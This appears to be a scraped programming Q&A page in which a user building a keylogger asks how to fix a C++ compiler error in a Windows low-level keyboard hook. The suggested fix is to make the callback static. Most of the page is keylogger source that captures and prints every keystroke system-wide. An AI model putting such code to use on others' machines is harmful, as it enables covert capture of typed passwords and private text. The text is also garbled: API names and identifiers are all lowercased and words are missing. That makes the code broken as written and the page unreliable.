c++ - error C2440: 'type cast' : cannot convert from 'overloaded-function' to 'HOOKPROC' -

i`m working on keylogger, , got


#pragma once #include <stdio.h> #include <windows.h>  class keylogger {     kbdllhookstruct kbdstruct;     byte keystate[256];     wchar buffer[16];  public:     hhook hkeyhook;      keylogger(void);     ~keylogger(void);     lresult winapi keyevent(int ncode, wparam wparam, lparam lparam); }; 


#include "keylogger.h"   keylogger::keylogger(void) { }   keylogger::~keylogger(void) { }  lresult winapi keylogger::keyevent(int ncode, wparam wparam, lparam lparam) {     if( (ncode == hc_action) && ((wparam == wm_syskeydown) || (wparam == wm_keydown)) )     {         kbdstruct = *((kbdllhookstruct*)lparam);         getkeyboardstate((pbyte)&keystate);         tounicode(kbdstruct.vkcode, kbdstruct.scancode, (pbyte)&keystate, (lpwstr)&buffer, sizeof(buffer) / 2, 0);         printf("%x\t%c\n", buffer[0], buffer[0]);     }      return callnexthookex(hkeyhook, ncode, wparam, lparam); } 


#include "keylogger.cpp"  int main(hinstance hinstance, hinstance hprevinstance, pstr szcmdline, int ncmdshow) {     keylogger kl = keylogger();      kl.hkeyhook = setwindowshookex(wh_keyboard_ll, (hookproc) kl.keyevent, getmodulehandle(null), 0);      msg message;     while(getmessage(&message, null, 0, 0))     {         translatemessage(&message);         dispatchmessage(&message);     }      unhookwindowshookex(kl.hkeyhook);     return 0; } 

on following line kl.hkeyhook = setwindowshookex(wh_keyboard_ll, (hookproc) kl.keyevent, getmodulehandle(null), 0); error c2440: 'type cast' : cannot convert 'overloaded-function' 'hookproc'

is there way fix this?

winapi c programming interface, doesn't know classes. callback should static:

static lresult winapi keyevent(int ncode, wparam wparam, lparam lparam); 


kl.hkeyhook = setwindowshookex(wh_keyboard_ll, (hookproc) keylogger::keyevent, getmodulehandle(null), 0); 


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